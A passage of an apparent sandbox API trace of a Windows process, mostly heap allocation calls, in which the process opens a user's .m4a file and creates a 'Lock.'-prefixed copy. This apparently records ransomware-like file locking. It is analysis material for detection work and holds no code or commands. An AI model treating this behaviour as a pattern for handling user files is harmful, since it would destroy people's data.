hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.184] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.184] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.184] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.184] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Go gw9icCK1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\go gw9icck1.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0199.185] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.185] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0199.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0199.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.Go gw9icCK1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.go gw9icck1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0199.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0199.186] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.187] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0199.187] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0199.190] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x1372, lpOverlapped=0x0) returned 1 [0199.190] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0199.192] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11372) returned 0x24d7a58 [0199.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.193] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0199.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0199.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11372) returned 0x24d7a58 [0199.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11372) returned 0x34c35d0 [0199.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.198] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0199.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.203] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 